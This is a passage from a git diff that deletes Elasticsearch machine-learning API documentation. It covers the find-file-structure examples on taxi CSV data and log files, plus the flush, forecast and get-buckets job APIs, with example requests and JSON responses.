"count" : 19998, - "cardinality" : 5, - "min_value" : 1, - "max_value" : 5, - "mean_value" : 1.0656565656565653, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 19311 - }, - { - "value" : 2, - "count" : 468 - }, - { - "value" : 5, - "count" : 195 - }, - { - "value" : 4, - "count" : 17 - }, - { - "value" : 3, - "count" : 7 - } - ] - }, - "VendorID" : { - "count" : 19998, - "cardinality" : 2, - "min_value" : 1, - "max_value" : 2, - "mean_value" : 1.59005900590059, - "median_value" : 2, - "top_hits" : [ - { - "value" : 2, - "count" : 11800 - }, - { - "value" : 1, - "count" : 8198 - } - ] - }, - "extra" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.5, - "max_value" : 0.5, - "mean_value" : 0.4815981598159816, - "median_value" : 0.5, - "top_hits" : [ - { - "value" : 0.5, - "count" : 19281 - }, - { - "value" : 0, - "count" : 698 - }, - { - "value" : -0.5, - "count" : 19 - } - ] - }, - "fare_amount" : { - "count" : 19998, - "cardinality" : 208, - "min_value" : -100, - "max_value" : 300, - "mean_value" : 13.937719771977209, - "median_value" : 9.5, - "top_hits" : [ - { - "value" : 6, - "count" : 1004 - }, - { - "value" : 6.5, - "count" : 935 - }, - { - "value" : 5.5, - "count" : 909 - }, - { - "value" : 7, - "count" : 903 - }, - { - "value" : 5, - "count" : 889 - }, - { - "value" : 7.5, - "count" : 854 - }, - { - "value" : 4.5, - "count" : 802 - }, - { - "value" : 8.5, - "count" : 790 - }, - { - "value" : 8, - "count" : 789 - }, - { - "value" : 9, - "count" : 711 - } - ] - }, - "improvement_surcharge" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.3, - "max_value" : 0.3, - "mean_value" : 0.29915991599159913, - "median_value" : 0.3, - "top_hits" : [ - { - "value" : 0.3, - "count" : 19964 - }, - { - "value" : -0.3, - "count" : 22 - }, - { - "value" : 0, - "count" : 12 - } - ] - }, - "mta_tax" : { - "count" : 19998, - "cardinality" : 3, - "min_value" : -0.5, - "max_value" : 0.5, - "mean_value" : 0.4962246224622462, - "median_value" : 0.5, - "top_hits" : [ - { - "value" : 0.5, - "count" : 19868 - }, - { - "value" : 0, - "count" : 109 - }, - { - "value" : -0.5, - "count" : 21 - } - ] - }, - "passenger_count" : { - "count" : 19998, - "cardinality" : 7, - "min_value" : 0, - "max_value" : 6, - "mean_value" : 1.6201620162016201, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 14219 - }, - { - "value" : 2, - "count" : 2886 - }, - { - "value" : 5, - "count" : 1047 - }, - { - "value" : 3, - "count" : 804 - }, - { - "value" : 6, - "count" : 523 - }, - { - "value" : 4, - "count" : 406 - }, - { - "value" : 0, - "count" : 113 - } - ] - }, - "payment_type" : { - "count" : 19998, - "cardinality" : 4, - "min_value" : 1, - "max_value" : 4, - "mean_value" : 1.315631563156316, - "median_value" : 1, - "top_hits" : [ - { - "value" : 1, - "count" : 13936 - }, - { - "value" : 2, - "count" : 5857 - }, - { - "value" : 3, - "count" : 160 - }, - { - "value" : 4, - "count" : 45 - } - ] - }, - "store_and_fwd_flag" : { - "count" : 19998, - "cardinality" : 2, - "top_hits" : [ - { - "value" : "N", - "count" : 19910 - }, - { - "value" : "Y", - "count" : 88 - } - ] - }, - "tip_amount" : { - "count" : 19998, - "cardinality" : 717, - "min_value" : 0, - "max_value" : 128, - "mean_value" : 2.010959095909593, - "median_value" : 1.45, - "top_hits" : [ - { - "value" : 0, - "count" : 6917 - }, - { - "value" : 1, - "count" : 1178 - }, - { - "value" : 2, - "count" : 624 - }, - { - "value" : 3, - "count" : 248 - }, - { - "value" : 1.56, - "count" : 206 - }, - { - "value" : 1.46, - "count" : 205 - }, - { - "value" : 1.76, - "count" : 196 - }, - { - "value" : 1.45, - "count" : 195 - }, - { - "value" : 1.36, - "count" : 191 - }, - { - "value" : 1.5, - "count" : 187 - } - ] - }, - "tolls_amount" : { - "count" : 19998, - "cardinality" : 26, - "min_value" : 0, - "max_value" : 35, - "mean_value" : 0.2729697969796978, - "median_value" : 0, - "top_hits" : [ - { - "value" : 0, - "count" : 19107 - }, - { - "value" : 5.76, - "count" : 791 - }, - { - "value" : 10.5, - "count" : 36 - }, - { - "value" : 2.64, - "count" : 21 - }, - { - "value" : 11.52, - "count" : 8 - }, - { - "value" : 5.54, - "count" : 4 - }, - { - "value" : 8.5, - "count" : 4 - }, - { - "value" : 17.28, - "count" : 4 - }, - { - "value" : 2, - "count" : 2 - }, - { - "value" : 2.16, - "count" : 2 - } - ] - }, - "total_amount" : { - "count" : 19998, - "cardinality" : 1267, - "min_value" : -100.3, - "max_value" : 389.12, - "mean_value" : 17.499898989898995, - "median_value" : 12.35, - "top_hits" : [ - { - "value" : 7.3, - "count" : 478 - }, - { - "value" : 8.3, - "count" : 443 - }, - { - "value" : 8.8, - "count" : 420 - }, - { - "value" : 6.8, - "count" : 406 - }, - { - "value" : 7.8, - "count" : 405 - }, - { - "value" : 6.3, - "count" : 371 - }, - { - "value" : 9.8, - "count" : 368 - }, - { - "value" : 5.8, - "count" : 362 - }, - { - "value" : 9.3, - "count" : 332 - }, - { - "value" : 10.3, - "count" : 332 - } - ] - }, - "tpep_dropoff_datetime" : { - "count" : 19998, - "cardinality" : 9066, - "earliest" : "2018-05-31 06:18:15", - "latest" : "2018-06-02 02:25:44", - "top_hits" : [ - { - "value" : "2018-06-01 01:12:12", - "count" : 10 - }, - { - "value" : "2018-06-01 00:32:15", - "count" : 9 - }, - { - "value" : "2018-06-01 00:44:27", - "count" : 9 - }, - { - "value" : "2018-06-01 00:46:42", - "count" : 9 - }, - { - "value" : "2018-06-01 01:03:22", - "count" : 9 - }, - { - "value" : "2018-06-01 01:05:13", - "count" : 9 - }, - { - "value" : "2018-06-01 00:11:20", - "count" : 8 - }, - { - "value" : "2018-06-01 00:16:03", - "count" : 8 - }, - { - "value" : "2018-06-01 00:19:47", - "count" : 8 - }, - { - "value" : "2018-06-01 00:25:17", - "count" : 8 - } - ] - }, - "tpep_pickup_datetime" : { - "count" : 19998, - "cardinality" : 8760, - "earliest" : "2018-05-31 06:08:31", - "latest" : "2018-06-02 01:21:21", - "top_hits" : [ - { - "value" : "2018-06-01 00:01:23", - "count" : 12 - }, - { - "value" : "2018-06-01 00:04:31", - "count" : 10 - }, - { - "value" : "2018-06-01 00:05:38", - "count" : 10 - }, - { - "value" : "2018-06-01 00:09:50", - "count" : 10 - }, - { - "value" : "2018-06-01 00:12:01", - "count" : 10 - }, - { - "value" : "2018-06-01 00:14:17", - "count" : 10 - }, - { - "value" : "2018-06-01 00:00:34", - "count" : 9 - }, - { - "value" : "2018-06-01 00:00:40", - "count" : 9 - }, - { - "value" : "2018-06-01 00:02:53", - "count" : 9 - }, - { - "value" : "2018-06-01 00:05:40", - "count" : 9 - } - ] - }, - "trip_distance" : { - "count" : 19998, - "cardinality" : 1687, - "min_value" : 0, - "max_value" : 64.63, - "mean_value" : 3.6521062106210715, - "median_value" : 2.16, - "top_hits" : [ - { - "value" : 0.9, - "count" : 335 - }, - { - "value" : 0.8, - "count" : 320 - }, - { - "value" : 1.1, - "count" : 316 - }, - { - "value" : 0.7, - "count" : 304 - }, - { - "value" : 1.2, - "count" : 303 - }, - { - "value" : 1, - "count" : 296 - }, - { - "value" : 1.3, - "count" : 280 - }, - { - "value" : 1.5, - "count" : 268 - }, - { - "value" : 1.6, - "count" : 268 - }, - { - "value" : 0.6, - "count" : 256 - } - ] - } - } -} ----- -// NOTCONSOLE - -<1> `num_messages_analyzed` is 2 lower than `num_lines_analyzed` because only - data records count as messages. The first line contains the column names - and in this sample the second line is blank. -<2> Unlike the first example, in this case the `format` has been identified as - `delimited`. -<3> Because the `format` is `delimited`, the `column_names` field in the output - lists the column names in the order they appear in the sample. -<4> `has_header_row` indicates that for this sample the column names were in - the first row of the sample. (If they hadn't been then it would have been - a good idea to specify them in the `column_names` query parameter.) -<5> The `delimiter` for this sample is a comma, as it's a CSV file. -<6> The `quote` character is the default double quote. (The structure finder - does not attempt to deduce any other quote character, so if you have a - delimited file that's quoted with some other character you must specify it - using the `quote` query parameter.) -<7> The `timestamp_field` has been chosen to be `tpep_pickup_datetime`. - `tpep_dropoff_datetime` would work just as well, but `tpep_pickup_datetime` - was chosen because it comes first in the column order. If you prefer - `tpep_dropoff_datetime` then force it to be chosen using the - `timestamp_field` query parameter. -<8> `joda_timestamp_formats` are used to tell Logstash how to parse timestamps. -<9> `java_timestamp_formats` are the Java time formats recognized in the time - fields. Elasticsearch mappings and Ingest pipeline use this format. -<10> The timestamp format in this sample doesn't specify a timezone, so to - accurately convert them to UTC timestamps to store in Elasticsearch it's - necessary to supply the timezone they relate to. `need_client_timezone` - will be `false` for timestamp formats that include the timezone. - - -[[ml-find-file-structure-example-timeout]] -=== Setting the timeout parameter - -If you try to analyze a lot of data then the analysis will take a long time. -If you want to limit the amount of processing your {es} cluster performs for -a request, use the `timeout` query parameter. The analysis will be aborted and -an error returned when the timeout expires. For example, you can replace 20000 -lines in the previous example with 200000 and set a 1 second timeout on the -analysis: - -[source,js] ----- -curl -s "s3.amazonaws.com/nyc-tlc/trip+data/yellow_tripdata_2018-06.csv" | head -200000 | curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&lines_to_sample=200000&timeout=1s" -T - ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -Unless you are using an incredibly fast computer you'll receive a timeout error: - -[source,js] ----- -{ - "error" : { - "root_cause" : [ - { - "type" : "timeout_exception", - "reason" : "Aborting structure analysis during [delimited record parsing] as it has taken longer than the timeout of [1s]" - } - ], - "type" : "timeout_exception", - "reason" : "Aborting structure analysis during [delimited record parsing] as it has taken longer than the timeout of [1s]" - }, - "status" : 500 -} ----- -// NOTCONSOLE - --- -NOTE: If you try the example above yourself you will note that the overall -running time of the `curl` commands is considerably longer than 1 second. This -is because it takes a while to download 200000 lines of CSV from the internet, -and the timeout is measured from the time this endpoint starts to process the -data. --- - - -[[ml-find-file-structure-example-eslog]] -=== Analyzing {es} log files - -This is an example of analyzing {es}'s own log file: - -[source,js] ----- -curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty" -T "$ES_HOME/logs/elasticsearch.log" ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -If the request does not encounter errors, the result will look something like -this: - -[source,js] ----- -{ - "num_lines_analyzed" : 53, - "num_messages_analyzed" : 53, - "sample_start" : "[2018-09-27T14:39:28,518][INFO ][o.e.e.NodeEnvironment ] [node-0] using [1] data paths, mounts [[/ (/dev/disk1)]], net usable_space [165.4gb], net total_space [464.7gb], types [hfs]\n[2018-09-27T14:39:28,521][INFO ][o.e.e.NodeEnvironment ] [node-0] heap size [494.9mb], compressed ordinary object pointers [true]\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "semi_structured_text", <1> - "multiline_start_pattern" : "^\\[\\b\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", <2> - "grok_pattern" : "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel}.*", <3> - "timestamp_field" : "timestamp", - "joda_timestamp_formats" : [ - "ISO8601" - ], - "java_timestamp_formats" : [ - "ISO8601" - ], - "need_client_timezone" : true, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "loglevel" : { - "type" : "keyword" - }, - "message" : { - "type" : "text" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "grok" : { - "field" : "message", - "patterns" : [ - "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel}.*" - ] - } - }, - { - "date" : { - "field" : "timestamp", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - }, - { - "remove" : { - "field" : "timestamp" - } - } - ] - }, - "field_stats" : { - "loglevel" : { - "count" : 53, - "cardinality" : 3, - "top_hits" : [ - { - "value" : "INFO", - "count" : 51 - }, - { - "value" : "DEBUG", - "count" : 1 - }, - { - "value" : "WARN", - "count" : 1 - } - ] - }, - "timestamp" : { - "count" : 53, - "cardinality" : 28, - "earliest" : "2018-09-27T14:39:28,518", - "latest" : "2018-09-27T14:39:37,012", - "top_hits" : [ - { - "value" : "2018-09-27T14:39:29,859", - "count" : 10 - }, - { - "value" : "2018-09-27T14:39:29,860", - "count" : 9 - }, - { - "value" : "2018-09-27T14:39:29,858", - "count" : 6 - }, - { - "value" : "2018-09-27T14:39:28,523", - "count" : 3 - }, - { - "value" : "2018-09-27T14:39:34,234", - "count" : 2 - }, - { - "value" : "2018-09-27T14:39:28,518", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,521", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,522", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:29,861", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:32,786", - "count" : 1 - } - ] - } - } -} ----- -// NOTCONSOLE - -<1> This time the `format` has been identified as `semi_structured_text`. -<2> The `multiline_start_pattern` is set on the basis that the timestamp appears - in the first line of each multi-line log message. -<3> A very simple `grok_pattern` has been created, which extracts the timestamp - and recognizable fields that appear in every analyzed message. In this case - the only field that was recognized beyond the timestamp was the log level. - - -[[ml-find-file-structure-example-grok]] -=== Specifying `grok_pattern` as query parameter - -If you recognize more fields than the simple `grok_pattern` produced by the -structure finder unaided then you can resubmit the request specifying a more -advanced `grok_pattern` as a query parameter and the structure finder will -calculate `field_stats` for your additional fields. - -In the case of the {es} log a more complete Grok pattern is -`\[%{TIMESTAMP_ISO8601:timestamp}\]\[%{LOGLEVEL:loglevel} *\]\[%{JAVACLASS:class} *\] \[%{HOSTNAME:node}\] %{JAVALOGMESSAGE:message}`. -You can analyze the same log file again, submitting this `grok_pattern` as a -query parameter (appropriately URL escaped): - -[source,js] ----- -curl -s -H "Content-Type: application/json" -XPOST "localhost:9200/_ml/find_file_structure?pretty&format=semi_structured_text&grok_pattern=%5C%5B%25%7BTIMESTAMP_ISO8601:timestamp%7D%5C%5D%5C%5B%25%7BLOGLEVEL:loglevel%7D%20*%5C%5D%5C%5B%25%7BJAVACLASS:class%7D%20*%5C%5D%20%5C%5B%25%7BHOSTNAME:node%7D%5C%5D%20%25%7BJAVALOGMESSAGE:message%7D" -T "$ES_HOME/logs/elasticsearch.log" ----- -// NOTCONSOLE -// Not converting to console because this shows how curl can be used - -If the request does not encounter errors, the result will look something like -this: - -[source,js] ----- -{ - "num_lines_analyzed" : 53, - "num_messages_analyzed" : 53, - "sample_start" : "[2018-09-27T14:39:28,518][INFO ][o.e.e.NodeEnvironment ] [node-0] using [1] data paths, mounts [[/ (/dev/disk1)]], net usable_space [165.4gb], net total_space [464.7gb], types [hfs]\n[2018-09-27T14:39:28,521][INFO ][o.e.e.NodeEnvironment ] [node-0] heap size [494.9mb], compressed ordinary object pointers [true]\n", - "charset" : "UTF-8", - "has_byte_order_marker" : false, - "format" : "semi_structured_text", - "multiline_start_pattern" : "^\\[\\b\\d{4}-\\d{2}-\\d{2}[T ]\\d{2}:\\d{2}", - "grok_pattern" : "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel} *\\]\\[%{JAVACLASS:class} *\\] \\[%{HOSTNAME:node}\\] %{JAVALOGMESSAGE:message}", <1> - "timestamp_field" : "timestamp", - "joda_timestamp_formats" : [ - "ISO8601" - ], - "java_timestamp_formats" : [ - "ISO8601" - ], - "need_client_timezone" : true, - "mappings" : { - "properties" : { - "@timestamp" : { - "type" : "date" - }, - "class" : { - "type" : "keyword" - }, - "loglevel" : { - "type" : "keyword" - }, - "message" : { - "type" : "text" - }, - "node" : { - "type" : "keyword" - } - } - }, - "ingest_pipeline" : { - "description" : "Ingest pipeline created by file structure finder", - "processors" : [ - { - "grok" : { - "field" : "message", - "patterns" : [ - "\\[%{TIMESTAMP_ISO8601:timestamp}\\]\\[%{LOGLEVEL:loglevel} *\\]\\[%{JAVACLASS:class} *\\] \\[%{HOSTNAME:node}\\] %{JAVALOGMESSAGE:message}" - ] - } - }, - { - "date" : { - "field" : "timestamp", - "timezone" : "{{ event.timezone }}", - "formats" : [ - "ISO8601" - ] - } - }, - { - "remove" : { - "field" : "timestamp" - } - } - ] - }, - "field_stats" : { <2> - "class" : { - "count" : 53, - "cardinality" : 14, - "top_hits" : [ - { - "value" : "o.e.p.PluginsService", - "count" : 26 - }, - { - "value" : "o.e.c.m.MetadataIndexTemplateService", - "count" : 8 - }, - { - "value" : "o.e.n.Node", - "count" : 7 - }, - { - "value" : "o.e.e.NodeEnvironment", - "count" : 2 - }, - { - "value" : "o.e.a.ActionModule", - "count" : 1 - }, - { - "value" : "o.e.c.s.ClusterApplierService", - "count" : 1 - }, - { - "value" : "o.e.c.s.MasterService", - "count" : 1 - }, - { - "value" : "o.e.d.DiscoveryModule", - "count" : 1 - }, - { - "value" : "o.e.g.GatewayService", - "count" : 1 - }, - { - "value" : "o.e.l.LicenseService", - "count" : 1 - } - ] - }, - "loglevel" : { - "count" : 53, - "cardinality" : 3, - "top_hits" : [ - { - "value" : "INFO", - "count" : 51 - }, - { - "value" : "DEBUG", - "count" : 1 - }, - { - "value" : "WARN", - "count" : 1 - } - ] - }, - "message" : { - "count" : 53, - "cardinality" : 53, - "top_hits" : [ - { - "value" : "Using REST wrapper from plugin org.elasticsearch.xpack.security.Security", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-alerts] for index patterns [.monitoring-alerts-6]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-beats] for index patterns [.monitoring-beats-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-es] for index patterns [.monitoring-es-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-kibana] for index patterns [.monitoring-kibana-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.monitoring-logstash] for index patterns [.monitoring-logstash-6-*]", - "count" : 1 - }, - { - "value" : "adding template [.triggered_watches] for index patterns [.triggered_watches*]", - "count" : 1 - }, - { - "value" : "adding template [.watch-history-9] for index patterns [.watcher-history-9*]", - "count" : 1 - }, - { - "value" : "adding template [.watches] for index patterns [.watches*]", - "count" : 1 - }, - { - "value" : "starting ...", - "count" : 1 - } - ] - }, - "node" : { - "count" : 53, - "cardinality" : 1, - "top_hits" : [ - { - "value" : "node-0", - "count" : 53 - } - ] - }, - "timestamp" : { - "count" : 53, - "cardinality" : 28, - "earliest" : "2018-09-27T14:39:28,518", - "latest" : "2018-09-27T14:39:37,012", - "top_hits" : [ - { - "value" : "2018-09-27T14:39:29,859", - "count" : 10 - }, - { - "value" : "2018-09-27T14:39:29,860", - "count" : 9 - }, - { - "value" : "2018-09-27T14:39:29,858", - "count" : 6 - }, - { - "value" : "2018-09-27T14:39:28,523", - "count" : 3 - }, - { - "value" : "2018-09-27T14:39:34,234", - "count" : 2 - }, - { - "value" : "2018-09-27T14:39:28,518", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,521", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:28,522", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:29,861", - "count" : 1 - }, - { - "value" : "2018-09-27T14:39:32,786", - "count" : 1 - } - ] - } - } -} ----- -// NOTCONSOLE - -<1> The `grok_pattern` in the output is now the overridden one supplied in the - query parameter. -<2> The returned `field_stats` include entries for the fields from the - overridden `grok_pattern`. - -The URL escaping is hard, so if you are working interactively it is best to use -the {ml} UI! diff --git a/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc b/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc deleted file mode 100644 index 0d72266f94a..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/flush-job.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-flush-job]] -= Flush jobs API -++++ -Flush jobs -++++ - -Forces any buffered data to be processed by the job. - -[[ml-flush-job-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_flush` - -[[ml-flush-job-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-flush-job-desc]] -== {api-description-title} - -The flush jobs API is only applicable when sending data for analysis using the -<>. Depending on the content of the buffer, then it -might additionally calculate new results. - -Both flush and close operations are similar, however the flush is more efficient -if you are expecting to send more data for analysis. When flushing, the job -remains open and is available to continue analyzing data. A close operation -additionally prunes and persists the model state to disk and the job must be -opened again before analyzing further data. - -[[ml-flush-job-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-flush-job-query-parms]] -== {api-query-parms-title} - -`advance_time`:: - (string) Optional. Specifies to advance to a particular time value. Results are - generated and the model is updated for data from the specified time interval. - -`calc_interim`:: - (Boolean) Optional. If true, calculates the interim results for the most - recent bucket or all buckets within the latency period. - -`end`:: - (string) Optional. When used in conjunction with `calc_interim`, specifies the - range of buckets on which to calculate interim results. - -`skip_time`:: - (string) Optional. Specifies to skip to a particular time value. Results are - not generated and the model is not updated for data from the specified time - interval. - -`start`:: - (string) Optional. When used in conjunction with `calc_interim`, specifies the - range of buckets on which to calculate interim results. - -[[ml-flush-job-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_flush -{ - "calc_interim": true -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the operation succeeds, you receive the following results: - -[source,console-result] ----- -{ - "flushed": true, - "last_finalized_bucket_end": 1455234900000 -} ----- -//TESTRESPONSE[s/"last_finalized_bucket_end": 1455234900000/"last_finalized_bucket_end": $body.last_finalized_bucket_end/] - -The `last_finalized_bucket_end` provides the timestamp (in -milliseconds-since-the-epoch) of the end of the last bucket that was processed. - -If you want to flush the job to a specific timestamp, you can use the -`advance_time` or `skip_time` parameters. For example, to advance to 11 AM GMT -on January 1, 2018: - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_flush -{ - "advance_time": "1514804400000" -} --------------------------------------------------- -// TEST[skip:setup:server_metrics_openjob] - -When the operation succeeds, you receive the following results: - -[source,console-result] ----- -{ - "flushed": true, - "last_finalized_bucket_end": 1514804400000 -} ----- diff --git a/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc b/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc deleted file mode 100644 index 2e92b278a9c..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/forecast.asciidoc +++ /dev/null @@ -1,95 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-forecast]] -= Forecast jobs API -++++ -Forecast jobs -++++ - -Predicts the future behavior of a time series by using its historical behavior. - -[[ml-forecast-request]] -== {api-request-title} - -`POST _ml/anomaly_detectors//_forecast` - -[[ml-forecast-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `manage_ml` or -`manage` cluster privileges to use this API. See -<> and {ml-docs-setup-privileges}. - -[[ml-forecast-desc]] -== {api-description-title} - -You can create a forecast job based on an {anomaly-job} to extrapolate future -behavior. Refer to -{ml-docs}/ml-overview.html#ml-forecasting[Forecasting the future] and -{ml-docs}/ml-limitations.html#ml-forecast-limitations[forecast limitations] to -learn more. - -You can delete a forecast by using the -<>. - -[NOTE] -=============================== - -* If you use an `over_field_name` property in your job, you cannot create a -forecast. For more information about this property, see <>. -* The job must be open when you create a forecast. Otherwise, an error occurs. -=============================== - -[[ml-forecast-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -[[ml-forecast-request-body]] -== {api-request-body-title} - -`duration`:: - (Optional, <>) A period of time that indicates how far - into the future to forecast. For example, `30d` corresponds to 30 days. The - default value is 1 day. The forecast starts at the last record that was - processed. - -`expires_in`:: - (Optional, <>) The period of time that forecast - results are retained. After a forecast expires, the results are deleted. The - default value is 14 days. If set to a value of `0`, the forecast is never - automatically deleted. - -`max_model_memory`:: - (Optional, <>) The maximum memory the forecast can use. - If the forecast needs to use more than the provided amount, it will spool to - disk. Default is 20mb, maximum is 500mb and minimum is 1mb. If set to 40% or - more of the job's configured memory limit, it is automatically reduced to - below that amount. - -[[ml-forecast-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -POST _ml/anomaly_detectors/total-requests/_forecast -{ - "duration": "10d" -} --------------------------------------------------- -// TEST[skip:requires delay] - -When the forecast is created, you receive the following results: -[source,js] ----- -{ - "acknowledged": true, - "forecast_id": "wkCWa2IB2lF8nSE_TzZo" -} ----- -// NOTCONSOLE - -You can subsequently see the forecast in the *Single Metric Viewer* in {kib}. - diff --git a/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc b/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc deleted file mode 100644 index 77cc43738d9..00000000000 --- a/docs/reference/ml/anomaly-detection/apis/get-bucket.asciidoc +++ /dev/null @@ -1,222 +0,0 @@ -[role="xpack"] -[testenv="platinum"] -[[ml-get-bucket]] -= Get buckets API -++++ -Get buckets -++++ - -Retrieves {anomaly-job} results for one or more buckets. - -[[ml-get-bucket-request]] -== {api-request-title} - -`GET _ml/anomaly_detectors//results/buckets` + - -`GET _ml/anomaly_detectors//results/buckets/` - -[[ml-get-bucket-prereqs]] -== {api-prereq-title} - -* If the {es} {security-features} are enabled, you must have `monitor_ml`, -`monitor`, `manage_ml`, or `manage` cluster privileges to use this API. You also -need `read` index privilege on the index that stores the results. The -`machine_learning_admin` and `machine_learning_user` roles provide these -privileges. For more information, see <>, -<>, and {ml-docs-setup-privileges}. - -[[ml-get-bucket-desc]] -== {api-description-title} - -The get buckets API presents a chronological view of the records, grouped by -bucket. - -[[ml-get-bucket-path-parms]] -== {api-path-parms-title} - -``:: -(Required, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -``:: -(Optional, string) The timestamp of a single bucket result. If you do not -specify this parameter, the API returns information about all buckets. - -[[ml-get-bucket-request-body]] -== {api-request-body-title} - -`anomaly_score`:: -(Optional, double) Returns buckets with anomaly scores greater or equal than -this value. - -`desc`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=desc-results] - -`end`:: -(Optional, string) Returns buckets with timestamps earlier than this time. - -`exclude_interim`:: -(Optional, Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=exclude-interim-results] - -`expand`:: -(Optional, Boolean) If true, the output includes anomaly records. - -`page`.`from`:: -(Optional, integer) Skips the specified number of buckets. - -`page`.`size`:: -(Optional, integer) Specifies the maximum number of buckets to obtain. - -`sort`:: -(Optional, string) Specifies the sort field for the requested buckets. By -default, the buckets are sorted by the `timestamp` field. - -`start`:: -(Optional, string) Returns buckets with timestamps after this time. - -[role="child_attributes"] -[[ml-get-bucket-results]] -== {api-response-body-title} - -The API returns an array of bucket objects, which have the following properties: - -`anomaly_score`:: -(number) The maximum anomaly score, between 0-100, for any of the bucket -influencers. This is an overall, rate-limited score for the job. All the anomaly -records in the bucket contribute to this score. This value might be updated as -new data is analyzed. - -`bucket_influencers`:: -(array) An array of bucket influencer objects. -+ -.Properties of `bucket_influencers` -[%collapsible%open] -==== -`anomaly_score`::: -(number) A normalized score between 0-100, which is calculated for each bucket -influencer. This score might be updated as newer data is analyzed. - -`bucket_span`::: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`initial_anomaly_score`::: -(number) The score between 0-100 for each bucket influencer. This score is the -initial value that was calculated at the time the bucket was processed. - -`influencer_field_name`::: -(string) The field name of the influencer. - -`influencer_field_value`::: -(string) The field value of the influencer. - -`is_interim`::: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`::: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`probability`::: -(number) The probability that the bucket has this behavior, in the range 0 to 1. -This value can be held to a high precision of over 300 decimal places, so the -`anomaly_score` is provided as a human-readable and friendly interpretation of -this. - -`raw_anomaly_score`::: -(number) Internal. - -`result_type`::: -(string) Internal. This value is always set to `bucket_influencer`. - -`timestamp`::: -(date) The start time of the bucket for which these results were calculated. -==== - -`bucket_span`:: -(number) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=bucket-span-results] - -`event_count`:: -(number) The number of input data records processed in this bucket. - -`initial_anomaly_score`:: -(number) The maximum `anomaly_score` for any of the bucket influencers. This is -the initial value that was calculated at the time the bucket was processed. - -`is_interim`:: -(Boolean) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=is-interim] - -`job_id`:: -(string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=job-id-anomaly-detection] - -`processing_time_ms`:: -(number) The amount of time, in milliseconds, that it took to analyze the bucket -contents and calculate results. - -`result_type`:: -(string) Internal. This value is always set to `bucket`. - -`timestamp`:: -(date) The start time of the bucket. This timestamp uniquely identifies the -bucket. -+ --- -NOTE: Events that occur exactly at the timestamp of the bucket are included in -the results for the bucket. - --- - -[[ml-get-bucket-example]] -== {api-examples-title} - -[source,console] --------------------------------------------------- -GET _ml/anomaly_detectors/low_request_rate/results/buckets -{ - "anomaly_score": 80, - "start": "1454530200001" -} --------------------------------------------------- -// TEST[skip:Kibana sample data] - -In this example, the API returns a single result that matches the specified -score and time constraints: -[source,js] ----- -{ - "count" : 1, - "buckets" : [ - { - "job_id" : "low_request_rate", - "timestamp" : 1578398400000, - "anomaly_score" : 91.58505459594764, - 